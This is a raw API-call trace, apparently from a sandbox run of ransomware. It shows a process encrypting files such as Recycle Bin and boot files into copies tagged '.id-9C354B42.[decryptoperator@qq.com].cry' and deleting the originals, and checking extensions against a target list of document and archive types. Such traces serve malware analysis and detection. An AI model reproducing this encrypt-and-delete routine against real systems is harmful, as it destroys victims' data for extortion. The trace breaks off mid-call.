RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x650450 [0035.249] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x6) returned 0x63a4e8 [0035.249] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x650468 [0035.249] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x100000) returned 0x3520020 [0035.249] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x650480 [0035.249] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x650480, Size=0x20) returned 0x67fd60 [0035.249] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x650480 [0035.249] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x650480, Size=0x20) returned 0x67fd88 [0035.249] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0035.249] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0035.250] Wow64DisableWow64FsRedirection (in: OldValue=0x225ff58 | out: OldValue=0x225ff58*=0x0) returned 1 [0035.250] lstrlenW (lpString="kernel32.dll") returned 12 [0035.250] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x67fd60 | out: hHeap=0x600000) returned 1 [0035.250] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0035.250] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x67fd88 | out: hHeap=0x600000) returned 1 [0035.250] Sleep (dwMilliseconds=0x64) [0035.361] lstrcmpiW (lpString1=".ini", lpString2=".cry") returned 1 [0035.361] lstrlenW (lpString="desktop.ini") returned 11 [0035.361] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.361] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=129) returned 1 [0035.361] CloseHandle (hObject=0x170) returned 1 [0035.361] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 0x26 [0035.361] GetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.361] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.361] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.361] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.361] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0035.362] GetLastError () returned 0x0 [0035.362] ReadFile (in: hFile=0x170, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x81, lpOverlapped=0x0) returned 1 [0035.377] WriteFile (in: hFile=0x174, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x90, lpOverlapped=0x0) returned 1 [0035.378] ReadFile (in: hFile=0x170, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.378] WriteFile (in: hFile=0x174, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xea, lpOverlapped=0x0) returned 1 [0035.378] SetEndOfFile (hFile=0x174) returned 1 [0035.378] CloseHandle (hObject=0x174) returned 1 [0035.378] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.378] SetEndOfFile (hFile=0x170) returned 1 [0035.379] CloseHandle (hObject=0x170) returned 1 [0035.379] SetFileAttributesW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x26) returned 1 [0035.382] DeleteFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 1 [0035.382] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0035.382] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0035.382] lstrlenW (lpString=".doc") returned 4 [0035.382] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0035.382] lstrlenW (lpString=".docx") returned 5 [0035.382] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0035.382] lstrlenW (lpString=".pdf") returned 4 [0035.382] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0035.382] lstrlenW (lpString=".xls") returned 4 [0035.382] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0035.382] lstrlenW (lpString=".xlsx") returned 5 [0035.382] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0035.382] lstrlenW (lpString=".ppt") returned 4 [0035.382] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0035.382] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0035.383] lstrlenW (lpString=".zip") returned 4 [0035.383] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0035.383] lstrlenW (lpString=".rar") returned 4 [0035.383] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0035.383] lstrlenW (lpString=".bz2") returned 4 [0035.383] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0035.383] lstrlenW (lpString=".7z") returned 3 [0035.383] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0035.383] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0035.383] lstrlenW (lpString=".dbf") returned 4 [0035.383] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0035.383] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0035.383] lstrlenW (lpString=".1cd") returned 4 [0035.383] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0035.383] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0035.383] lstrlenW (lpString=".jpg") returned 4 [0035.383] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0035.383] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0035.383] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0035.383] lstrlenW (lpString=".doc") returned 4 [0035.383] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0035.383] lstrlenW (lpString=".docx") returned 5 [0035.383] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0035.383] lstrlenW (lpString=".pdf") returned 4 [0035.383] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0035.383] lstrlenW (lpString=".xls") returned 4 [0035.383] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0035.383] lstrlenW (lpString=".xlsx") returned 5 [0035.383] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0035.383] lstrlenW (lpString=".ppt") returned 4 [0035.383] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0035.383] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0035.383] lstrlenW (lpString=".zip") returned 4 [0035.383] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0035.383] lstrlenW (lpString=".rar") returned 4 [0035.383] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0035.383] lstrlenW (lpString=".bz2") returned 4 [0035.383] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0035.383] lstrlenW (lpString=".7z") returned 3 [0035.384] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0035.384] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0035.384] lstrlenW (lpString=".dbf") returned 4 [0035.384] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0035.384] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0035.384] lstrlenW (lpString=".1cd") returned 4 [0035.384] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0035.384] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0035.384] lstrlenW (lpString=".jpg") returned 4 [0035.384] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0035.384] lstrcmpiW (lpString1=".LOG", lpString2=".cry") returned 1 [0035.384] lstrlenW (lpString="BCD.LOG") returned 7 [0035.384] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.384] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0035.384] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0035.384] lstrlenW (lpString=".doc") returned 4 [0035.384] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0035.384] lstrlenW (lpString=".docx") returned 5 [0035.384] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0035.384] lstrlenW (lpString=".pdf") returned 4 [0035.384] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0035.384] lstrlenW (lpString=".xls") returned 4 [0035.384] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0035.387] lstrlenW (lpString=".xlsx") returned 5 [0035.387] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0035.387] lstrlenW (lpString=".ppt") returned 4 [0035.387] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0035.387] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0035.387] lstrlenW (lpString=".zip") returned 4 [0035.387] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0035.387] lstrlenW (lpString=".rar") returned 4 [0035.387] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0035.387] lstrlenW (lpString=".bz2") returned 4 [0035.387] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0035.387] lstrlenW (lpString=".7z") returned 3 [0035.387] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0035.387] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0035.387] lstrlenW (lpString=".dbf") returned 4 [0035.388] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0035.388] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0035.388] lstrlenW (lpString=".1cd") returned 4 [0035.388] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0035.388] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0035.388] lstrlenW (lpString=".jpg") returned 4 [0035.388] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0035.388] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0035.388] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0035.388] lstrlenW (lpString=".doc") returned 4 [0035.388] lstrcmpiW (lpString1=".doc", lpString2=".LOG") returned -1 [0035.388] lstrlenW (lpString=".docx") returned 5 [0035.388] lstrcmpiW (lpString1=".docx", lpString2="D.LOG") returned -1 [0035.388] lstrlenW (lpString=".pdf") returned 4 [0035.388] lstrcmpiW (lpString1=".pdf", lpString2=".LOG") returned 1 [0035.388] lstrlenW (lpString=".xls") returned 4 [0035.388] lstrcmpiW (lpString1=".xls", lpString2=".LOG") returned 1 [0035.390] lstrlenW (lpString=".xlsx") returned 5 [0035.390] lstrcmpiW (lpString1=".xlsx", lpString2="D.LOG") returned -1 [0035.390] lstrlenW (lpString=".ppt") returned 4 [0035.390] lstrcmpiW (lpString1=".ppt", lpString2=".LOG") returned 1 [0035.390] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0035.390] lstrlenW (lpString=".zip") returned 4 [0035.390] lstrcmpiW (lpString1=".zip", lpString2=".LOG") returned 1 [0035.390] lstrlenW (lpString=".rar") returned 4 [0035.390] lstrcmpiW (lpString1=".rar", lpString2=".LOG") returned 1 [0035.390] lstrlenW (lpString=".bz2") returned 4 [0035.390] lstrcmpiW (lpString1=".bz2", lpString2=".LOG") returned -1 [0035.390] lstrlenW (lpString=".7z") returned 3 [0035.390] lstrcmpiW (lpString1=".7z", lpString2="LOG") returned -1 [0035.390] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0035.390] lstrlenW (lpString=".dbf") returned 4 [0035.390] lstrcmpiW (lpString1=".dbf", lpString2=".LOG") returned -1 [0035.390] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0035.390] lstrlenW (lpString=".1cd") returned 4 [0035.390] lstrcmpiW (lpString1=".1cd", lpString2=".LOG") returned -1 [0035.391] lstrlenW (lpString="C:\\Boot\\BCD.LOG") returned 15 [0035.391] lstrlenW (lpString=".jpg") returned 4 [0035.391] lstrcmpiW (lpString1=".jpg", lpString2=".LOG") returned -1 [0035.391] lstrcmpiW (lpString1=".DAT", lpString2=".cry") returned 1 [0035.391] lstrlenW (lpString="BOOTSTAT.DAT") returned 12 [0035.391] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.391] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=65536) returned 1 [0035.391] CloseHandle (hObject=0x170) returned 1 [0035.391] GetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat")) returned 0x26 [0035.391] GetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\boot\\bootstat.dat.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.391] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.391] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.391] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.391] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\boot\\bootstat.dat.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0035.392] GetLastError () returned 0x0 [0035.392] ReadFile (in: hFile=0x170, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x10000, lpOverlapped=0x0) returned 1 [0035.394] WriteFile (in: hFile=0x174, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x10010, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x10010, lpOverlapped=0x0) returned 1 [0035.396] ReadFile (in: hFile=0x170, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.396] WriteFile (in: hFile=0x174, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0035.396] SetEndOfFile (hFile=0x174) returned 1 [0035.396] CloseHandle (hObject=0x174) returned 1 [0035.400] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.400] SetEndOfFile (hFile=0x170) returned 1 [0035.401] CloseHandle (hObject=0x170) returned 1 [0035.401] SetFileAttributesW (lpFileName="C:\\Boot\\BOOTSTAT.DAT.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x26) returned 1 [0035.401] DeleteFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat")) returned 1 [0035.401] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0035.401] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0035.401] lstrlenW (lpString=".doc") returned 4 [0035.401] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0035.401] lstrlenW (lpString=".docx") returned 5 [0035.401] lstrcmpiW (lpString1=".docx", lpString2="T.DAT") returned -1 [0035.401] lstrlenW (lpString=".pdf") returned 4 [0035.401] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0035.401] lstrlenW (lpString=".xls") returned 4 [0035.401] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0035.401] lstrlenW (lpString=".xlsx") returned 5 [0035.401] lstrcmpiW (lpString1=".xlsx", lpString2="T.DAT") returned -1 [0035.401] lstrlenW (lpString=".ppt") returned 4 [0035.401] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0035.401] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0035.401] lstrlenW (lpString=".zip") returned 4 [0035.402] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0035.402] lstrlenW (lpString=".rar") returned 4 [0035.402] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0035.402] lstrlenW (lpString=".bz2") returned 4 [0035.402] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0035.402] lstrlenW (lpString=".7z") returned 3 [0035.402] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0035.402] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0035.402] lstrlenW (lpString=".dbf") returned 4 [0035.402] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0035.402] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0035.402] lstrlenW (lpString=".1cd") returned 4 [0035.402] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0035.402] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0035.402] lstrlenW (lpString=".jpg") returned 4 [0035.402] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0035.402] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0035.402] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0035.402] lstrlenW (lpString=".doc") returned 4 [0035.402] lstrcmpiW (lpString1=".doc", lpString2=".DAT") returned 1 [0035.402] lstrlenW (lpString=".docx") returned 5 [0035.402] lstrcmpiW (lpString1=".docx", lpString2="T.DAT") returned -1 [0035.402] lstrlenW (lpString=".pdf") returned 4 [0035.402] lstrcmpiW (lpString1=".pdf", lpString2=".DAT") returned 1 [0035.402] lstrlenW (lpString=".xls") returned 4 [0035.402] lstrcmpiW (lpString1=".xls", lpString2=".DAT") returned 1 [0035.402] lstrlenW (lpString=".xlsx") returned 5 [0035.402] lstrcmpiW (lpString1=".xlsx", lpString2="T.DAT") returned -1 [0035.402] lstrlenW (lpString=".ppt") returned 4 [0035.402] lstrcmpiW (lpString1=".ppt", lpString2=".DAT") returned 1 [0035.402] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0035.402] lstrlenW (lpString=".zip") returned 4 [0035.402] lstrcmpiW (lpString1=".zip", lpString2=".DAT") returned 1 [0035.402] lstrlenW (lpString=".rar") returned 4 [0035.402] lstrcmpiW (lpString1=".rar", lpString2=".DAT") returned 1 [0035.402] lstrlenW (lpString=".bz2") returned 4 [0035.402] lstrcmpiW (lpString1=".bz2", lpString2=".DAT") returned -1 [0035.402] lstrlenW (lpString=".7z") returned 3 [0035.403] lstrcmpiW (lpString1=".7z", lpString2="DAT") returned -1 [0035.403] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0035.403] lstrlenW (lpString=".dbf") returned 4 [0035.403] lstrcmpiW (lpString1=".dbf", lpString2=".DAT") returned 1 [0035.403] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0035.403] lstrlenW (lpString=".1cd") returned 4 [0035.403] lstrcmpiW (lpString1=".1cd", lpString2=".DAT") returned -1 [0035.403] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0035.403] lstrlenW (lpString=".jpg") returned 4 [0035.403] lstrcmpiW (lpString1=".jpg", lpString2=".DAT") returned 1 [0035.403] lstrcmpiW (lpString1=".BAK", lpString2=".cry") returned -1 [0035.403] lstrlenW (lpString="BOOTSECT.BAK") returned 12 [0035.403] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.404] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x225ff1c | out: lpFileSize=0x225ff1c*=8192) returned 1 [0035.404] CloseHandle (hObject=0x170) returned 1 [0035.404] GetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 0x27 [0035.404] GetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\bootsect.bak.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.404] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK", dwFileAttributes=0x26) returned 1 [0035.404] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.404] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.404] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.404] CreateFileW (lpFileName="C:\\BOOTSECT.BAK.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\bootsect.bak.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0035.405] GetLastError () returned 0x0 [0035.405] ReadFile (in: hFile=0x170, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x2000, lpOverlapped=0x0) returned 1 [0035.415] WriteFile (in: hFile=0x174, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0x2010, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0x2010, lpOverlapped=0x0) returned 1 [0035.416] ReadFile (in: hFile=0x170, lpBuffer=0x3520020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x225fed4, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesRead=0x225fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.416] WriteFile (in: hFile=0x174, lpBuffer=0x3520020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x225fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3520020*, lpNumberOfBytesWritten=0x225fc9c*=0xec, lpOverlapped=0x0) returned 1 [0035.416] SetEndOfFile (hFile=0x174) returned 1 [0035.416] CloseHandle (hObject=0x174) returned 1 [0035.416] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x225fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.416] SetEndOfFile (hFile=0x170) returned 1 [0035.417] CloseHandle (hObject=0x170) returned 1 [0035.417] SetFileAttributesW (lpFileName="C:\\BOOTSECT.BAK.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x27) returned 1 [0035.418] DeleteFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak")) returned 1 [0035.418] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0035.418] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0035.418] lstrlenW (lpString=".doc") returned 4 [0035.418] lstrcmpiW (lpString1=".doc", lpString2=".BAK") returned 1 [0035.418] lstrlenW (lpString=".docx") returned 5 [0035.418] lstrcmpiW (lpString1=".docx", lpString2="T.BAK") returned -1 [0035.418] lstrlenW (lpString=".pdf") returned 4 [0035.418] lstrcmpiW (lpString1=".pdf", lpString2=".BAK") returned 1 [0035.418] lstrlenW (lpString=".xls") returned 4 [0035.418] lstrcmpiW (lpString1=".xls", lpString2=".BAK") returned 1 [0035.418] lstrlenW (lpString=".xlsx") returned 5 [0035.418] lstrcmpiW (lpString1=".xlsx", lpString2="T.BAK") returned -1 [0035.418] lstrlenW (lpString=".ppt") returned 4 [0035.418] lstrcmpiW (lpString1=".ppt", lpString2=".BAK") returned 1 [0035.418] lstrlenW (lpString="C:\\BOOTSECT.BAK") returned 15 [0035.418] lstrlenW 